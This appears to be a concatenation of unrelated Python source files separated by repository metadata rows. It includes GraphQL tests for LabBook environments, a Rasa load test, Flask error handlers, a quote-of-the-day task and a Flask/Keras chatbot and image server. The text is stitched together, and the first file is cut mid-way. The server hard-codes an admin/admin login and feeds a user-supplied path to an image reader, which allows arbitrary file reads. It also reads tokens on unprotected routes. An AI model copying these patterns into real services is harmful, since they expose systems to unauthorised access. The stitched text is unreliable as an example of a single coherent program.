from lmsrvlabbook.tests.fixtures import fixture_working_dir_env_repo_scoped, fixture_working_dir
class TestEnvironmentServiceQueries(object):
    """GraphQL integration tests for a LabBook's environment queries.

    Each test builds a LabBook through ``InventoryManager`` /
    ``ComponentManager`` fixtures and snapshot-asserts the GraphQL
    responses (or asserts fields directly for the update checks).
    """
    def test_get_environment_status(self, fixture_working_dir, snapshot):
        """Test getting the a LabBook's environment status"""
        im = InventoryManager()
        lb = im.create_labbook("default", "default", "labbook10", description="my first labbook10000")
        query = """
        {
            labbook(owner: "default", name: "labbook10") {
                environment {
                    containerStatus
                    imageStatus
                }
            }
        }
        """
        snapshot.assert_match(fixture_working_dir[2].execute(query))
    def test_get_base(self, fixture_working_dir_env_repo_scoped, snapshot):
        """Test getting the a LabBook's base"""
        # Create labbook
        query = """
        mutation myCreateLabbook($name: String!, $desc: String!, $repository: String!,
                                 $base_id: String!, $revision: Int!) {
          createLabbook(input: {name: $name, description: $desc,
                                repository: $repository,
                                baseId: $base_id, revision: $revision}) {
            labbook {
              id
              name
              description
            }
          }
        }
        """
        variables = {"name": "labbook-base-test", "desc": "my test 1",
                     "base_id": ENV_UNIT_TEST_BASE, "repository": ENV_UNIT_TEST_REPO,
                     "revision": ENV_UNIT_TEST_REV}
        snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query, variable_values=variables))
        query = """
        {
            labbook(owner: "default", name: "labbook-base-test") {
                name
                description
                environment {
                    base{
                        id
                        componentId
                        name
                        description
                        readme
                        tags
                        icon
                        osClass
                        osRelease
                        license
                        url
                        languages
                        developmentTools
                        dockerImageServer
                        dockerImageNamespace
                        dockerImageRepository
                        dockerImageTag
                        packageManagers
                    }
                }
            }
        }
        """
        snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
    def test_get_package_manager(self, fixture_working_dir_env_repo_scoped, snapshot):
        """Test getting the a LabBook's package manager dependencies"""
        # Create labbook
        im = InventoryManager()
        lb = im.create_labbook("default", "default", "labbook4", description="my first labbook10000")
        query = """
                    {
                      labbook(owner: "default", name: "labbook4") {
                        environment {
                         packageDependencies {
                            edges {
                                node {
                                    id
                                    manager
                                    package
                                    version
                                    fromBase
                                }
                                cursor
                            }
                            pageInfo {
                                hasNextPage
                            }
                          }
                        }
                      }
                    }
                    """
        # should be null
        snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
        # Add a base image
        cm = ComponentManager(lb)
        pkgs = [{"manager": "pip", "package": "requests", "version": "1.3"},
                {"manager": "pip", "package": "numpy", "version": "1.12"},
                {"manager": "pip", "package": "gtmunit1", "version": "0.2.4"}]
        cm.add_packages('pip', pkgs)
        pkgs = [{"manager": "conda3", "package": "cdutil", "version": "8.1"},
                {"manager": "conda3", "package": "nltk", "version": '3.2.5'}]
        cm.add_packages('conda3', pkgs)
        # Add one package without a version, which should cause an error in the API since version is required
        pkgs = [{"manager": "apt", "package": "lxml", "version": "3.4"}]
        cm.add_packages('apt', pkgs)
        query = """
                    {
                      labbook(owner: "default", name: "labbook4") {
                        environment {
                          packageDependencies {
                            edges {
                                node {
                                    id
                                    manager
                                    package
                                    version
                                    fromBase
                                }
                                cursor
                            }
                            pageInfo {
                                hasNextPage
                            }
                          }
                        }
                      }
                    }
                    """
        r1 = fixture_working_dir_env_repo_scoped[2].execute(query)
        assert 'errors' not in r1
        snapshot.assert_match(r1)
        # Paginated query; cursor "MA==" is base64 for "0".
        query = """
                    {
                      labbook(owner: "default", name: "labbook4") {
                        environment {
                          packageDependencies(first: 2, after: "MA==") {
                            edges {
                                node {
                                    id
                                    manager
                                    package
                                    version
                                    fromBase
                                }
                                cursor
                            }
                            pageInfo {
                                hasNextPage
                            }
                          }
                        }
                      }
                    }
                    """
        r1 = fixture_working_dir_env_repo_scoped[2].execute(query)
        assert 'errors' not in r1
        snapshot.assert_match(r1)
    def test_get_package_manager_metadata(self, fixture_working_dir_env_repo_scoped, snapshot):
        """Test getting the a LabBook's package manager dependencies"""
        # Create labbook
        im = InventoryManager()
        lb = im.create_labbook("default", "default", "labbook4meta", description="my first asdf")
        query = """
                   {
                      labbook(owner: "default", name: "labbook4meta") {
                        environment {
                          packageDependencies {
                            edges {
                                node {
                                    id
                                    manager
                                    package
                                    version
                                    fromBase
                                    description
                                    docsUrl
                                    latestVersion
                                }
                                cursor
                            }
                            pageInfo {
                                hasNextPage
                            }
                          }
                        }
                      }
                    }
                    """
        # should be null
        snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
        # Add a base image
        cm = ComponentManager(lb)
        pkgs = [{"manager": "pip", "package": "gtmunit3", "version": "5.0"},
                {"manager": "pip", "package": "gtmunit2", "version": "12.2"},
                {"manager": "pip", "package": "gtmunit1", "version": '0.2.1'}]
        cm.add_packages('pip', pkgs)
        pkgs = [{"manager": "conda3", "package": "cdutil", "version": "8.1"},
                {"manager": "conda3", "package": "python-coveralls", "version": "2.5.0"}]
        cm.add_packages('conda3', pkgs)
        r1 = fixture_working_dir_env_repo_scoped[2].execute(query)
        assert 'errors' not in r1
        snapshot.assert_match(r1)
    def test_package_query_with_errors(self, snapshot, fixture_working_dir_env_repo_scoped):
        """Test querying for package info"""
        # Create labbook
        im = InventoryManager()
        lb = im.create_labbook("default", "default", "labbook5", description="my first labbook10000")
        query = """
                   {
                      labbook(owner: "default", name: "labbook5"){
                        id
                        checkPackages(packageInput: [
                          {manager: "pip", package: "gtmunit1", version:"0.2.4"},
                          {manager: "pip", package: "gtmunit2", version:"100.00"},
                          {manager: "pip", package: "gtmunit3", version:""},
                          {manager: "pip", package: "asdfasdfasdf", version:""}]){
                            id
                            manager
                            package
                            version
                            latestVersion
                            description
                            isValid
                        }
                      }
                    }
                """
        snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
    def test_package_query_with_errors_conda(self, snapshot, fixture_working_dir_env_repo_scoped):
        """Test querying for package info"""
        # Create labbook
        im = InventoryManager()
        lb = im.create_labbook("default", "default", "labbook5conda", description="my first labbook10000")
        query = """
                   {
                      labbook(owner: "default", name: "labbook5conda"){
                        id
                        checkPackages(packageInput: [
                          {manager: "conda3", package: "cdutil", version:"8.1"},
                          {manager: "conda3", package: "nltk", version:"100.00"},
                          {manager: "conda3", package: "python-coveralls", version:""},
                          {manager: "conda3", package: "thisshouldtotallyfail", version:"1.0"},
                          {manager: "conda3", package: "notarealpackage", version:""}]){
                            id
                            manager
                            package
                            version
                            latestVersion
                            description
                            isValid
                        }
                      }
                    }
                """
        snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
    def test_package_query_with_errors_apt(self, snapshot, fixture_working_dir_env_repo_scoped):
        """Test querying for package info"""
        # Create labbook
        im = InventoryManager()
        lb = im.create_labbook("default", "default", "labbook5apt", description="my first labbook10000")
        # Create Component Manager
        cm = ComponentManager(lb)
        # Add a component
        cm.add_base(ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_BASE, ENV_UNIT_TEST_REV)
        query = """
                   {
                      labbook(owner: "default", name: "labbook5apt"){
                        id
                        checkPackages(packageInput: [
                          {manager: "apt", package: "curl", version:"8.1"},
                          {manager: "apt", package: "notarealpackage", version:""}]){
                            id
                            manager
                            package
                            version
                            latestVersion
                            description
                            isValid
                        }
                      }
                    }
                """
        snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
    def test_package_query(self, snapshot, fixture_working_dir_env_repo_scoped):
        """Test querying for package info"""
        im = InventoryManager()
        lb = im.create_labbook("default", "default", "labbook6", description="my first labbook10000")
        query = """
                   {
                      labbook(owner: "default", name: "labbook6"){
                        id
                        checkPackages(packageInput: [
                          {manager: "pip", package: "gtmunit1", version:"0.2.4"},
                          {manager: "pip", package: "gtmunit2", version:""}]){
                            id
                            manager
                            package
                            version
                            isValid
                        }
                      }
                    }
                """
        snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
    def test_package_query_no_version(self, snapshot, fixture_working_dir_env_repo_scoped):
        """Test querying for package info"""
        im = InventoryManager()
        lb = im.create_labbook("default", "default", "labbook6noversion", description="my first labbook10000")
        # Create Component Manager
        cm = ComponentManager(lb)
        cm.add_base(ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_BASE, ENV_UNIT_TEST_REV)
        query = """
                   {
                      labbook(owner: "default", name: "labbook6noversion"){
                        id
                        checkPackages(packageInput: [
                          {manager: "pip", package: "gtmunit1"},
                          {manager: "pip", package: "notarealpackage"}]){
                            id
                            manager
                            package
                            version
                            latestVersion
                            description
                            isValid
                        }
                      }
                    }
                """
        snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
        query = """
                   {
                      labbook(owner: "default", name: "labbook6noversion"){
                        id
                        checkPackages(packageInput: [
                          {manager: "apt", package: "curl"},
                          {manager: "apt", package: "notarealpackage"}]){
                            id
                            manager
                            package
                            version
                            latestVersion
                            description
                            isValid
                        }
                      }
                    }
                """
        snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
        query = """
                   {
                      labbook(owner: "default", name: "labbook6noversion"){
                        id
                        checkPackages(packageInput: [
                          {manager: "conda3", package: "nltk"},
                          {manager: "conda3", package: "notarealpackage"}]){
                            id
                            manager
                            package
                            version
                            latestVersion
                            description
                            isValid
                        }
                      }
                    }
                """
        snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
    def test_bundle_app_query(self, snapshot, fixture_working_dir_env_repo_scoped):
        """Test querying for bundled app info"""
        im = InventoryManager()
        lb = im.create_labbook("default", "default", "labbook-bundle", description="my first df")
        query = """
                   {
                      labbook(owner: "default", name: "labbook-bundle"){
                        id
                        environment {
                          bundledApps{
                            id
                            appName
                            description
                            port
                            command
                          }
                        }
                      }
                    }
                """
        # First run: no bundled apps registered yet.
        snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
        bam = BundledAppManager(lb)
        bam.add_bundled_app(8050, 'dash 1', 'a demo dash app 1', 'python app1.py')
        bam.add_bundled_app(9000, 'dash 2', 'a demo dash app 2', 'python app2.py')
        bam.add_bundled_app(9001, 'dash 3', 'a demo dash app 3', 'python app3.py')
        snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query))
    def test_base_update_available(self, fixture_working_dir_env_repo_scoped, snapshot):
        """Test checking if the base is able to be updated"""
        im = InventoryManager()
        lb = im.create_labbook('default', 'default', 'labbook-base-test-update')
        cm = ComponentManager(lb)
        # Add an old base.
        cm.add_base(gtmcore.fixtures.ENV_UNIT_TEST_REPO, 'quickstart-jupyterlab', 1)
        query = """
                {
                    labbook(owner: "default", name: "labbook-base-test-update") {
                        name
                        description
                        environment {
                            base{
                                id
                                revision
                            }
                            baseLatestRevision
                        }
                    }
                }
                """
        r = fixture_working_dir_env_repo_scoped[2].execute(query)
        assert 'errors' not in r
        assert r['data']['labbook']['environment']['base']['revision'] == 1
        assert r['data']['labbook']['environment']['baseLatestRevision'] == 2
        # We upgrade our base to the latest
        cm.change_base(gtmcore.fixtures.ENV_UNIT_TEST_REPO, 'quickstart-jupyterlab', 2)
        r = fixture_working_dir_env_repo_scoped[2].execute(query)
        assert 'errors' not in r
        assert r['data']['labbook']['environment']['base']['revision'] == 2
        assert r['data']['labbook']['environment']['baseLatestRevision'] == 2
        query = """
                {
                    labbook(owner: "default", name: "labbook-base-test-update") {
                        name
                        environment {
                            baseLatestRevision
                        }
                    }
                }
                """
        r = fixture_working_dir_env_repo_scoped[2].execute(query)
        assert 'errors' not in r
        assert r['data']['labbook']['environment']['baseLatestRevision'] == 2
| 39.546 | 111 | 0.427603 |
abc03851149e0e601af538d349c6fb66b255a6d7 | 1,705 | py | Python | mars/core/__init__.py | chineking/mars | 660098c65bcb389c6bbebc26b2502a9b3af43cf9 | [
"Apache-2.0"
] | 1 | 2022-02-24T08:39:26.000Z | 2022-02-24T08:39:26.000Z | mars/core/__init__.py | chineking/mars | 660098c65bcb389c6bbebc26b2502a9b3af43cf9 | [
"Apache-2.0"
] | null | null | null | mars/core/__init__.py | chineking/mars | 660098c65bcb389c6bbebc26b2502a9b3af43cf9 | [
"Apache-2.0"
] | null | null | null | # Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# noinspection PyUnresolvedReferences
from ..typing import ChunkType, TileableType, EntityType, OperandType
from .base import ExecutionError
from .entity import (
Entity,
EntityData,
ENTITY_TYPE,
Chunk,
ChunkData,
CHUNK_TYPE,
Tileable,
TileableData,
TILEABLE_TYPE,
Object,
ObjectData,
ObjectChunk,
ObjectChunkData,
OBJECT_TYPE,
OBJECT_CHUNK_TYPE,
FuseChunk,
FuseChunkData,
FUSE_CHUNK_TYPE,
OutputType,
register_output_types,
get_output_types,
register_fetch_class,
get_fetch_class,
get_tileable_types,
get_chunk_types,
HasShapeTileable,
HasShapeTileableData,
ExecutableTuple,
_ExecuteAndFetchMixin,
NotSupportTile,
register,
unregister,
tile,
recursive_tile,
)
# noinspection PyUnresolvedReferences
from .graph import (
DirectedGraph,
DAG,
GraphContainsCycleError,
TileableGraph,
ChunkGraph,
TileableGraphBuilder,
ChunkGraphBuilder,
TileContext,
TileStatus,
)
from .mode import enter_mode, is_build_mode, is_eager_mode, is_kernel_mode
| 25.073529 | 74 | 0.734311 |
abc3eecfb1dec304561dc28f93ae2435fd288309 | 379 | py | Python | automatization_of_data_mining_project/data_set_statistic_reporter/classes/statistic_generator/statistic_generator.py | Sale1996/automatization_of_data_mining_project | 223aec59231586563a3b125bff064f8420630a8f | [
"MIT"
] | null | null | null | automatization_of_data_mining_project/data_set_statistic_reporter/classes/statistic_generator/statistic_generator.py | Sale1996/automatization_of_data_mining_project | 223aec59231586563a3b125bff064f8420630a8f | [
"MIT"
] | null | null | null | automatization_of_data_mining_project/data_set_statistic_reporter/classes/statistic_generator/statistic_generator.py | Sale1996/automatization_of_data_mining_project | 223aec59231586563a3b125bff064f8420630a8f | [
"MIT"
] | null | null | null | from typing import List
class StatisticGenerator(object):
    """Base class for statistic generators over a tabular data set.

    Subclasses override :meth:`generate_statistic`; the base implementation
    is an intentional no-op stub.
    """

    def __init__(self, column_names):
        # Names of the data-set columns this generator reports on.
        self.column_names = column_names

    # FIX: the original annotation `(List[str], List[str])` was a tuple
    # literal, not a valid typing construct; the quoted Tuple form documents
    # the intent without requiring an extra import.
    def generate_statistic(self, data_set) -> "Tuple[List[str], List[str]]":
        """Return two parallel lists.

        1. Statistic column names.
        2. Statistic column values for each column name.

        The base class returns ``None``; concrete subclasses provide the
        actual computation.
        """
        pass
abc47a42e5800e9371627fb5c621e40ef15d6a3b | 741 | py | Python | app/errors/handlers.py | kai-jinny/Agile-Development-Project | d3879040c3b8a70bf539f3c7db0437da6766c6c4 | [
"MIT"
] | 2 | 2021-04-08T06:50:49.000Z | 2021-04-17T12:52:45.000Z | app/errors/handlers.py | kai-jinny/Agile-Development-Project | d3879040c3b8a70bf539f3c7db0437da6766c6c4 | [
"MIT"
] | 16 | 2021-04-12T08:21:49.000Z | 2021-05-18T07:21:38.000Z | app/errors/handlers.py | kai-jinny/Agile-Development-Project | d3879040c3b8a70bf539f3c7db0437da6766c6c4 | [
"MIT"
] | 1 | 2021-04-17T12:54:34.000Z | 2021-04-17T12:54:34.000Z |
from flask import render_template
from app import db
from app.errors import bp
@bp.app_errorhandler(400)
def not_found_error(error):
return render_template('errors/400.html'), 400
@bp.app_errorhandler(401)
def not_found_error(error):
return render_template('errors/401.html'), 401
@bp.app_errorhandler(403)
def not_found_error(error):
return render_template('errors/403.html'), 403
@bp.app_errorhandler(404)
def not_found_error(error):
return render_template('errors/404.html'), 404
@bp.app_errorhandler(409)
def not_found_error(error):
return render_template('errors/409.html'), 409
@bp.app_errorhandler(500)
def internal_error(error):
db.session.rollback()
return render_template('errors/500.html'), 500 | 24.7 | 50 | 0.766532 |
abc5a6e1c8eb95e21a2424169d41cb33a6c8f98e | 1,199 | py | Python | rasa-rest-explode-brain.py | nprovotorov/rasa-rest-api-loadtest | 31ee3308d9b11ff98e56172801943c3016c5bf93 | [
"MIT"
] | 6 | 2021-01-05T02:53:23.000Z | 2022-02-17T07:53:36.000Z | rasa-rest-explode-brain.py | nprovotorov/rasa-rest-api-loadtest | 31ee3308d9b11ff98e56172801943c3016c5bf93 | [
"MIT"
] | null | null | null | rasa-rest-explode-brain.py | nprovotorov/rasa-rest-api-loadtest | 31ee3308d9b11ff98e56172801943c3016c5bf93 | [
"MIT"
] | 1 | 2021-01-26T01:08:57.000Z | 2021-01-26T01:08:57.000Z | import random
import uuid
from locust import HttpUser, task, between
# REST endpoint the load test posts chat messages to; swap in the Rasa X
# path below when targeting Rasa X instead of a bare Rasa Core server.
apiUrl = "/webhooks/rest/webhook" # Rasa Core REST API endpoint
# apiUrl = "/core/webhooks/rest/webhook" # Rasa X REST API endpoint
class RasaRestExplodeBrainUser(HttpUser):
    """Locust user that stresses a Rasa bot with greetings, questions and chatter."""
    wait_time = between(3, 10)

    def on_start(self):
        # Unique sender id so Rasa keeps a separate conversation per user.
        self.name = str(uuid.uuid1())
        with open("questions.txt") as fh:
            self.questions = fh.readlines()
        with open("messages.txt") as fh:
            self.messages = fh.readlines()

    def _post_message(self, text):
        # All tasks share the same REST payload shape.
        self.client.post(apiUrl, json={"sender": self.name, "message": text})

    @task(1)
    def sayHello(self):
        self._post_message("Hello!")

    @task(2)
    def askQuestion(self):
        self._post_message(random.choice(self.questions))

    @task(3)
    def saySomethingRandom(self):
        self._post_message(random.choice(self.messages))
abc616e2534ce71688707838c39b33ab9fe3a9aa | 869 | py | Python | yepes/contrib/standards/models.py | samuelmaudo/yepes | 1ef9a42d4eaa70d9b3e6e7fa519396c1e1174fcb | [
"BSD-3-Clause"
] | null | null | null | yepes/contrib/standards/models.py | samuelmaudo/yepes | 1ef9a42d4eaa70d9b3e6e7fa519396c1e1174fcb | [
"BSD-3-Clause"
] | null | null | null | yepes/contrib/standards/models.py | samuelmaudo/yepes | 1ef9a42d4eaa70d9b3e6e7fa519396c1e1174fcb | [
"BSD-3-Clause"
] | null | null | null | # -*- coding:utf-8 -*-
from yepes.apps import apps
AbstractCountry = apps.get_class('standards.abstract_models', 'AbstractCountry')
AbstractCountrySubdivision = apps.get_class('standards.abstract_models', 'AbstractCountrySubdivision')
AbstractCurrency = apps.get_class('standards.abstract_models', 'AbstractCurrency')
AbstractGeographicArea = apps.get_class('standards.abstract_models', 'AbstractGeographicArea')
AbstractLanguage = apps.get_class('standards.abstract_models', 'AbstractLanguage')
AbstractRegion = apps.get_class('standards.abstract_models', 'AbstractRegion')
class Country(AbstractCountry):
pass
class CountrySubdivision(AbstractCountrySubdivision):
pass
class Currency(AbstractCurrency):
pass
class GeographicArea(AbstractGeographicArea):
pass
class Language(AbstractLanguage):
pass
class Region(AbstractRegion):
    # Concrete model; all fields and behaviour come from AbstractRegion.
    pass
| 28.032258 | 102 | 0.802071 |
abca83db476237da93239ae54ed493e9e869002d | 48 | py | Python | randomForestRules/__init__.py | lukassykora/randomForestRules | 9da3b510a488a2453f48c220bbc289854917a86a | [
"MIT"
] | 3 | 2020-01-08T14:49:47.000Z | 2021-07-24T17:53:32.000Z | randomForestRules/__init__.py | lukassykora/randomForestRules | 9da3b510a488a2453f48c220bbc289854917a86a | [
"MIT"
] | 2 | 2020-11-01T17:00:22.000Z | 2021-08-22T17:13:06.000Z | randomForestRules/__init__.py | lukassykora/randomForestRules | 9da3b510a488a2453f48c220bbc289854917a86a | [
"MIT"
] | 4 | 2020-01-08T14:49:49.000Z | 2021-07-24T17:53:38.000Z | from .randomForestRules import RandomForestRules | 48 | 48 | 0.916667 |
abcb48c4f2cf0da6f255272f48b3091be08733b7 | 2,545 | py | Python | celery_project/daily_quote/quotes.py | engineervix/django-celery-sample | 9bb92a129bdd66d6c2259a41c690436c5c8316dc | [
"BSD-3-Clause"
] | null | null | null | celery_project/daily_quote/quotes.py | engineervix/django-celery-sample | 9bb92a129bdd66d6c2259a41c690436c5c8316dc | [
"BSD-3-Clause"
] | 194 | 2021-03-01T01:08:33.000Z | 2021-12-07T22:55:41.000Z | celery_project/daily_quote/quotes.py | engineervix/django-celery-sample | 9bb92a129bdd66d6c2259a41c690436c5c8316dc | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
"""quotery.py
This script is part of a daily celery task to fetch a quote
from a JSON file and save it to the database.
There should only be one quote at a time in the database.
On the template, we simply retrieve the quote and
display it on the website as "Quote of the Day".
The idea is to have a drop-in script that simulates an API call
so that in future, if we find a suitable quote API, we can easily
refactor accordingly and use the new API, without making significant
changes to the codebase.
"""
import os
import logging
import traceback
import re
from datetime import datetime
import json
from celery_project.daily_quote.models import Quote
# Module-level logger for quote-selection errors.
logger = logging.getLogger(__name__)
def quote_index(start_date):
    """
    Determine which quote (index) to retrieve from the given JSON file
    based on the current date.

    Args:
        start_date (str): the reference start date in YYYY-MM-DD format.
            This date corresponds to index 0.

    Returns:
        int: the (non-negative) index to retrieve
    """
    fmt = "%Y-%m-%d"
    try:
        reference = datetime.strptime(start_date, fmt)
    except ValueError:
        # Unparseable date: log the traceback and fall back to the
        # project launch date so callers still get a usable index.
        logger.error(traceback.format_exc())
        reference = datetime(2021, 3, 1)
    elapsed_days = (datetime.today() - reference).days
    # abs() guards against a reference date that lies in the future.
    return abs(elapsed_days)
def quote_of_the_day():
    """
    Return today's quote as a dict read from the bundled ``quotes.json``
    (the entries carry ``text`` and ``author`` keys, as used by
    ``sync_quote_of_the_day``).

    The entry is chosen by ``quote_index`` and wraps around when the
    running day counter exceeds the number of available quotes.
    """
    dir_path = os.path.dirname(os.path.realpath(__file__))
    json_file = os.path.join(dir_path, "quotes.json")
    with open(json_file, "r") as read_file:
        data = json.load(read_file)
    num_of_quotes = len(data)
    # Wrap the day counter around the list length.  Modulo is equivalent
    # to the previous repeated-subtraction loop (idx is non-negative) but
    # runs in O(1); an empty quotes file now raises ZeroDivisionError
    # instead of looping forever.
    idx = quote_index("2021-03-01") % num_of_quotes
    return data[idx]
def sync_quote_of_the_day():
    """
    Fetch today's quote and store it in the Quote model, then prune
    older rows so only one quote remains in the database.
    """
    todays_quote = quote_of_the_day()
    # Avoid storing the same quote text twice.
    already_saved = Quote.objects.filter(quote=todays_quote["text"]).exists()
    if not already_saved:
        new_entry = Quote(
            quote=todays_quote["text"],
            author_name=todays_quote["author"],
        )
        new_entry.save()
    # Keep only the first row (by the model's default ordering) and
    # delete everything else.
    stale_pks = list(Quote.objects.values_list("pk", flat=True)[1:])
    Quote.objects.filter(id__in=stale_pks).delete()
| 26.510417 | 72 | 0.666012 |
abcccf0a171f8f65a41202cdaec0c176a6cff770 | 7,718 | py | Python | backend/flask_app/server.py | aPorousRock/Angular2Flask | bac2fd68207bcfa6c33b85abddac8737375d407d | [
"MIT"
] | null | null | null | backend/flask_app/server.py | aPorousRock/Angular2Flask | bac2fd68207bcfa6c33b85abddac8737375d407d | [
"MIT"
] | null | null | null | backend/flask_app/server.py | aPorousRock/Angular2Flask | bac2fd68207bcfa6c33b85abddac8737375d407d | [
"MIT"
] | null | null | null | # !/usr/bin/env python
# -*- coding: utf-8 -*-
"""Entry point for the server application."""
import json
import logging
import traceback
from datetime import datetime
from flask import Response, request, jsonify, current_app
from gevent.wsgi import WSGIServer
from flask_jwt_simple import (
JWTManager, jwt_required, create_jwt, get_jwt_identity, get_jwt
)
from .http_codes import Status
from .factory import create_app, create_user
import os
import json
import nltk
import gensim
import numpy as np
from gensim import corpora, models, similarities
import pickle
import pandas as pd
from keras.models import load_model,Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, MaxPooling2D
from keras.optimizers import SGD
from keras.callbacks import ModelCheckpoint
from sklearn.metrics import matthews_corrcoef
from sklearn.metrics import hamming_loss
from keras import backend as K
K.set_image_dim_ordering('th')
Imagemodel = Sequential()
Imagemodel.add(Convolution2D(32, kernel_size=(3, 3),padding='same',input_shape=(3 , 100, 100)))
Imagemodel.add(Activation('relu'))
Imagemodel.add(Convolution2D(64, (3, 3)))
Imagemodel.add(Activation('relu'))
Imagemodel.add(MaxPooling2D(pool_size=(2, 2)))
Imagemodel.add(Dropout(0.25))
Imagemodel.add(Convolution2D(64,(3, 3), padding='same'))
Imagemodel.add(Activation('relu'))
Imagemodel.add(Convolution2D(64, 3, 3))
Imagemodel.add(Activation('relu'))
Imagemodel.add(MaxPooling2D(pool_size=(2, 2)))
Imagemodel.add(Dropout(0.25))
Imagemodel.add(Flatten())
Imagemodel.add(Dense(512))
Imagemodel.add(Activation('relu'))
Imagemodel.add(Dropout(0.5))
Imagemodel.add(Dense(9))
Imagemodel.add(Activation('sigmoid'))
Imagemodel.load_weights("/Users/ajinkya.parkar@ibm.com/Documents/deep/keras_multilabel/multilabel/weights.11-0.72365.hdf5")
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
Imagemodel.compile(loss='binary_crossentropy', optimizer=sgd, metrics=['accuracy'])
from IPython.display import Image
import cv2
logger = logging.getLogger(__name__)
app = create_app()
jwt = JWTManager(app)
model=load_model('LSTM5000.h5')
mod = gensim.models.Word2Vec.load('/Users/ajinkya.parkar@ibm.com/Downloads/apnews_sg/word2vec.bin');
@app.before_first_request
def init():
"""Initialize the application with defaults."""
create_user(app)
@jwt.jwt_data_loader
def add_claims_to_access_token(identity):
"""Explicitly set identity and claims for jwt."""
if identity == 'admin':
roles = 'admin'
else:
roles = 'peasant'
now = datetime.utcnow()
return {
'exp': now + current_app.config['JWT_EXPIRES'],
'iat': now,
'nbf': now,
'sub': identity,
'roles': roles
}
@app.route("/api/logout", methods=['POST'])
@jwt_required
def logout():
"""Logout the currently logged in user."""
# TODO: handle this logout properly, very weird implementation.
identity = get_jwt_identity()
if not identity:
return jsonify({"msg": "Token invalid"}), Status.HTTP_BAD_UNAUTHORIZED
logger.info('Logged out user !!')
return 'logged out successfully', Status.HTTP_OK_BASIC
@app.route('/api/login', methods=['POST'])
def login():
"""View function for login view."""
logger.info('Logged in user')
params = request.get_json()
username = params.get('username', None)
password = params.get('password', None)
if not username:
return jsonify({"msg": "Missing username parameter"}), Status.HTTP_BAD_REQUEST
if not password:
return jsonify({"msg": "Missing password parameter"}), Status.HTTP_BAD_REQUEST
# TODO Check from DB here
if username != 'admin' or password != 'admin':
return jsonify({"msg": "Bad username or password"}), Status.HTTP_BAD_UNAUTHORIZED
# Identity can be any data that is json serializable
# TODO: rather than passing expiry time here explicitly, decode token on client side. But I'm lazy.
ret = {'jwt': create_jwt(identity=username), 'exp': datetime.utcnow() + current_app.config['JWT_EXPIRES']}
return jsonify(ret), 200
@app.route('/api/protected', methods=['POST'])
@jwt_required
def get_data():
"""Get dummy data returned from the server."""
jwt_data = get_jwt()
data = {'Heroes': ['Hero1', 'Hero2', 'Hero3']}
json_response = json.dumps(data)
return Response(json_response,
status=Status.HTTP_OK_BASIC,
mimetype='application/json')
@app.route('/api/chat', methods=['POST'])
def get_chat():
"""Get dummy data returned from the server."""
jwt_data = get_jwt()
params = request.get_json()
myText = params.get('myText', None)
print(myText)
print(params)
sentend=np.ones((300,),dtype=np.float32)
sent=nltk.word_tokenize(myText)
sentvec = [mod[w] for w in sent if w in mod.vocab]
sentvec[14:]=[]
sentvec.append(sentend)
if len(sentvec)<15:
for i in range(15-len(sentvec)):
sentvec.append(sentend)
sentvec=np.array([sentvec])
predictions = model.predict(sentvec)
outputlist=[mod.most_similar([predictions[0][i]])[0][0] for i in range(5)]
output=' '.join(outputlist)
print(output)
data = {'Heroes': ['Hero1', 'Hero2', 'Hero3']}
json_response = json.dumps(output)
return Response(json_response,
status=Status.HTTP_OK_BASIC,
mimetype='application/json')
@app.route('/api/image', methods=['POST'])
def get_Image():
"""Get dummy data returned from the server."""
jwt_data = get_jwt()
params = request.get_json()
myText = params.get('myText', None)
print(myText)
print(params)
img = cv2.imread(myText)
img = cv2.resize(img,(100,100))
img = img.transpose((2,0,1))
img = img.astype('float32')
img = img/255
img = np.expand_dims(img,axis=0)
pred = Imagemodel.predict(img)
y_pred = np.array([1 if pred[0,i]>=0.6 else 0 for i in range(pred.shape[1])])
finalOutput = []
for key, value in enumerate(y_pred):
if key == 0 and value == 1:
finalOutput.append("Good for lunch")
if key == 1 and value == 1:
finalOutput.append("Good for dinner")
if key == 2 and value == 1:
finalOutput.append("Takes reservation")
if key == 3 and value == 1:
finalOutput.append("Outdoor seating")
if key == 4 and value == 1:
finalOutput.append("Restaurent is expensive")
if key == 5 and value == 1:
finalOutput.append("Has alchohol")
if key == 6 and value == 1:
finalOutput.append("Has Table Service")
if key == 7 and value == 1:
finalOutput.append("Ambience is classy")
if key == 8 and value == 1:
finalOutput.append("Good for kids")
print(finalOutput)
data = {'Heroes': ['Hero1', 'Hero2', 'Hero3']}
json_response = json.dumps(finalOutput)
return Response(json_response,
status=Status.HTTP_OK_BASIC,
mimetype='application/json')
def main():
"""Main entry point of the app."""
try:
port = 8080
ip = '0.0.0.0'
http_server = WSGIServer((ip, port),
app,
log=logging,
error_log=logging)
print("Server started at: {0}:{1}".format(ip, port))
http_server.serve_forever()
except Exception as exc:
logger.error(exc.message)
logger.exception(traceback.format_exc())
finally:
# Do something here
pass
| 31.246964 | 123 | 0.651075 |
